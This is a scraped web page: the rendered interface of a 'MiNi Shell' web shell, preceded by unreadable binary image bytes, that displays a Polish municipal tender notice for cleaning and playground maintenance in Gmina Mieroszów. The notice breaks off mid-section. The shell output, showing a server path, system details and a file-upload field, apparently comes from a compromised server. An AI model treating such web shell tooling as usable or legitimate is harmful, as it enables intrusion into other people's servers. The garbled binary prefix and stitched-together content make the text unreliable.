JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230209/0008838401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie porządku i czystości terenów komunalnych wraz z pielęgnacją kwiatów oraz utrzymanie prawidłowego stanu technicznego rekreacyjnych obiektów budowlanych na ternie Gminy Mieroszów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mieroszów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718260</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Niepodległości</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mieroszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">743030188</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mieroszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.mieroszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie porządku i czystości terenów komunalnych wraz z pielęgnacją kwiatów oraz utrzymanie prawidłowego stanu technicznego rekreacyjnych obiektów budowlanych na ternie Gminy Mieroszów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee25c692-a7b7-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00088384</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mieroszow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mieroszow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BR.271.09.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi dla zadania pn.:<br/>	Utrzymanie porządku i czystości terenów komunalnych wraz z pielęgnacją kwiatów oraz utrzymanie prawidłowego stanu technicznego rekreacyjnych obiektów budowlanych na ternie Gminy Mieroszów<br/>2. Wykonawca przyjmuje do wykonania przedmiot umowy polegający na utrzymaniu porządku i czystości terenów komunalnych wraz z pielęgnacją kwiatów i utrzymaniem prawidłowego stanu technicznego rekreacyjnych obiektów budowlanych w podziale na zadania.<br/>3.	Zestawienie terenów i obiektów będących przedmiotem zamówienia zawierają załączniki nr 1, 2 i 3 do umowy, stanowiącej Załącznik nr 6 do SWZ. <br/>4. Przedmiot umowy będzie realizowany w okresie od dnia 01.03.2023 r. do dnia 31 grudnia 2023 r. Szczegółowe zagadnienia dotyczące terminu realizacji poszczególnych zdań uregulowane są we wzorze umowy stanowiącej Załącznik nr 6 do SWZ.<br/>5. W ramach zadań do obowiązków wykonawcy należą:<br/>Zadanie I:<br/>1) Utrzymanie porządku i czystości ulic, chodników, terenów zielonych, placów zabaw, siłowni zewnętrznych oraz terenu Góry Parkowej- polegające na:<br/>a) bieżącym utrzymaniu porządku oraz czystości nawierzchni,<br/>b) codziennym uprzątnięciu śmieci znajdujących się chodnikach, terenach zielonych, placach zabaw, siłowniach zewnętrznych oraz terenie Góry Parkowej,<br/>c) powyższe prace będą realizowane w okresie: 01.04.2023 – 30.11.2023.<br/>2) Opróżnianie koszy na śmieci – polegającym na:<br/>a) codziennym (od poniedziałku do piątku) opróżnianiu koszy na śmieci oraz uporządkowaniu terenu wokół koszy w promieniu min. 2 m dookoła kosza,<br/>b) powyższe prace będą realizowane w okresie: 01.03.2023 – 31.12.2023.<br/>3) Wykaszanie i odchwaszczanie zieleni oraz przycinanie żywopłotów w pasach drogowych, na terenach zielonych, placów zabaw, siłowni zewnętrznych oraz terenie Góry Parkowej polegające na:<br/>a) 2 krotnym w ciągu roku cięciu żywopłotów,<br/>b) min. 6 krotnym w ciągu roku koszeniu zieleni, ilość koszeń uzależniona będzie od warunków pogodowych, wzrostu i estetyki zieleni,<br/>c) bieżącym odchwaszczaniu nasadzeń,<br/>d) powyższe prace będą realizowane w okresie: 01.04.2023 – 31.10.2023<br/>4) Pielęgnacja ukwiecenia miasta zlokalizowanego na skwerach oraz w kwietnikach (1 szt. kaskady kwietnej, 36 szt. donic (50 cm), 24 szt. donic zawieszonych na słupach oświetleniowych, 6 szt. skrzyń wolnostojących) polegająca na:<br/>a) bieżącej pielęgnacji z zachowaniem żywotności roślin i usuwaniem przekwitłych kwiatów,<br/>b) bieżącym nawadnianiu w celu utrzymania należytej wilgotności podłoża roślin,<br/>c) informowaniu Zamawiającego (pisemnie drogą mailową) o konieczności dostarczenia nowych sadzonek w celu uzupełnienia roślin obumarłych lub zastąpienia tych z widocznymi zmianami chorobowymi. Zamawiający pozostawia do własnej oceny, czy wskazane braki zostaną uzupełnione,<br/>d) obsadzeniu dostarczonymi przez Zamawiającego sadzonkami zastępczymi,<br/>e) powyższe prace będą realizowane w okresie: 01.05.2023 – 31.10.2023.<br/>Zadanie II:<br/>Utrzymanie czystości przystanków polegające na:<br/>a) codziennym (od poniedziałku do piątku) opróżnianiu koszy na śmieci,<br/>b) bieżącym utrzymaniu porządku oraz czystości nawierzchni,<br/>c) bieżącym uprzątnięciu śmieci znajdujących się na terenie i wokół przystanków,<br/>d) powyższe prace będą realizowane w okresie: 01.03.2023 – 31.12.2023.<br/>Zadanie III:<br/>1) Utrzymanie prawidłowego stanu technicznego rekreacyjnych urządzeń i obiektów budowlanych zlokalizowanych na placach zabaw, siłowniach zewnętrznych oraz na terenie Góry Parkowej w Mieroszowie ze szczególnym uwzględnieniem wieży widokowej, zadaszenia sceny, wiaty turystycznej, kładek rowerowych, urządzeń małej architektury polegającego na:<br/>a) bieżącej kontroli urządzeń na placach zabaw, siłowniach zewnętrznych oraz obiektów budowlanych i małej architektury (w tym ławki, kosze na śmieci) w celu ujawnienia zagrożeń. Kontrola polega na sprawdzeniu: czy urządzenia posiadają wszystkie elementy, stanu i zużycia połączeń oraz elementów ruchomych, wystąpienia ostrych krawędzi, stanu łańcuchów i lin, śladów rozkładu i korozji, zużycia części nie wskazanych wcześniej, uszkodzeń wynikających z wandalizmu. Kontrola obejmuje również weryfikację stanu tablic z regulaminem korzystania z placów zabaw, siłowni zewnętrznych obiektów budowlanych,<br/>b) bieżącej kontroli ogrodzeń. Kontrola polega na sprawdzeniu wad ogrodzenia takich jak: odsłonięte fundamenty, wystające elementy (druty, gwoździe itp.), ujawnieniu uszkodzeń mechanicznych elementów ogrodzenia,<br/>c) drobnych pracach i naprawach zapewniających bezpieczeństwo użytkowników w tym:<br/>c.a) poprawa mocowania poluzowanych desek;<br/>c.b) dokręcanie/uzupełnianie wkrętów, śrub, nakrętek;<br/>c.c) regulowanie naciągu lin;<br/>c.d) regulacja furtek, bram oraz przęseł ogrodzeniowych;<br/>c.e) usunięcie rozwarstwień/uszkodzeń belek drewnianych poprzez szlifowanie i malowanie (preparatem dostosowanym do obecnego);<br/>c.f) zabezpieczenie taśmą urządzeń w przypadku ich uszkodzenia w stopniu stwarzającym zagrożenie dla użytkowników oraz powiadomienie o tym fakcie Zamawiającego;<br/>c.g) likwidacja niebezpiecznych gniazd owadów pojawiających się w obrębie placów zabaw, siłowni zewnętrznych i terenu Góry Parkowej;<br/>c.h) utrzymanie nawierzchni piaskowej wokół urządzeń poprzez: uzupełnianie brakującego piasku, zasypywanie wystających fundamentów, grabienie podłoża;<br/>c.i) uzupełnianie/wymiana piasku w piaskownicach;<br/>c.j) mycie zabrudzonych urządzeń i ławek na placach zabaw, siłowniach zewnętrznych i obiektów zlokalizowanych na Górze Parkowej;<br/>c.k) usuwanie naklejek, reklam, graffiti i napisów;<br/>d) powyższe prace będą realizowane w okresie: 01.03.2023 – 31.12.2023.<br/>2) Wykonanie wymaganych przeglądów rocznych/pięcioletnich obiektów budowlanych i placów zabaw polegające na:<br/>a) przeprowadzeniu rocznego/pięcioletniego (zgodnie załączonym wykazem) przeglądu zgodnie z wymogami art. 62.1 ust. 1 ustawy z dnia 7 lipca 1994 Prawo Budowlane (t.j. Dz.U. z 2021r., poz. 2351),<br/>b) wypełnieniu książek obiektów budowlanych w ramach kontroli rocznej/pięcioletniej,<br/>c) przedstawieniu w formie protokołu zestawienia elementów poszczególnych urządzeń wymagających naprawy wraz z dokumentacją fotograficzną,<br/>d) po dokonaniu kontroli i uzupełnieniu wymaganych dokumentów wykonawca przedstawi świadectwo przeprowadzonych kontroli rocznej/pięcioletniej poświadczone przez osobę posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, uwzględniającego informację o dopuszczeniu/niedopuszczeniu placu zabaw/obiektu budowlanego do dalszej eksploatacji zgodnie z art. 62 ust. 1 ustawy Prawo Budowlane,<br/>e) powyższe prace będą realizowane w okresie: 01.05.2023 – 31.08.2023.<br/>6. Wykonawca do 2 dni od rozpoczęcia realizacji umowy przedstawi Zamawiającemu harmonogram wykonywania prac. Harmonogram podlega akceptacji Zamawiającego.<br/>7. W przypadku konieczności zmian w harmonogramie wykonawca min. 3 dni robocze przed datą obowiązywania zmian przedstawi poprawiony harmonogram Zamawiającemu. Poprawiony harmonogram podlega akceptacji Zamawiającego.<br/>8. Wytwórcą odpadów powstałych w trakcie wykonywania powierzonych obowiązków jest Wykonawca. Gospodarowanie wytworzonymi odpadami Wykonawca jest zobowiązany prowadzić zgodnie z obowiązującymi przepisami prawa. Wykonawca oświadcza, że prowadzi działalność w zakresie gospodarowania odpadami i jest wpisany do Bazy Danych o Odpadach (BDO).<br/>9.	Wykonawca oświadcza, że dysponuje odpowiednimi środkami technicznymi<br/>i organizacyjnymi do należytego wykonania przedmiotu umowy.<br/>10. Wykonawca ponosi pełną odpowiedzialność za szkody w mieniu Zamawiającego wynikające z niewykonania lub nienależytego wykonania umowy, a ponadto za szkody powstałe w mieniu i na osobach trzecich, powstałe przy wykonywaniu umowy.<br/>11. Wykonawca jest zobowiązany do powiadomienia Zamawiającego o wszelkich kradzieżach, dewastacjach i uszkodzeniach, każdorazowo drogą mailową oraz telefonicznie w dni robocze w godzinach pracy Zamawiającego.<br/>12. Wykonawca w toku wykonywania umowy zobowiązuje się postępować z należytą starannością. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90600000-3 - Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77312000-0 - Usługi usuwania chwastów</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-03-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat wykonał przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie co najmniej jedną usługę letniego utrzymania terenów komunalnych oraz jedną usługę utrzymania placów zabaw w jednym sezonie letnim wartości każdej z usług za sezon nie mniejszej niż 50.000,00 zł (brutto). Przez jedną usługę Zamawiający rozumie usługę wykonaną na podstawie jednej umowy. <br/>Warunek udziału w postępowaniu musi być spełniony:<br/>- przez Wykonawcę samodzielnie, lub<br/>- w przypadku Wykonawców występujących wspólnie, samodzielnie przez jednego <br/>z Wykonawców występujących wspólnie, lub<br/>- przez podmiot udostępniający samodzielnie<br/>b) Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub ma możliwość dysponowania osobą posiadającą - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej wydanymi zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U.2019 r. poz. 831) uprawniające do przeprowadzenia przeglądu objętego przedmiotem zamówienia lub im odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, uprawniające do przeglądu objętego przedmiotem zamówienia. W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. – Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. 2020 r. poz. 220). <br/>Warunek udziału w postępowaniu musi być spełniony:<br/>- przez Wykonawcę samodzielnie, lub<br/>- w przypadku Wykonawców występujących wspólnie, samodzielnie przez jednego z Wykonawców występujących wspólnie, lub<br/>- przez podmiot udostępniający samodzielnie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 4 do SWZ; <br/>2) oświadczenie składane na podstawie art. 125 ust. 1 ustawy - zgodnie z Załącznikiem nr 2 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik nr 5 do SWZ;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: 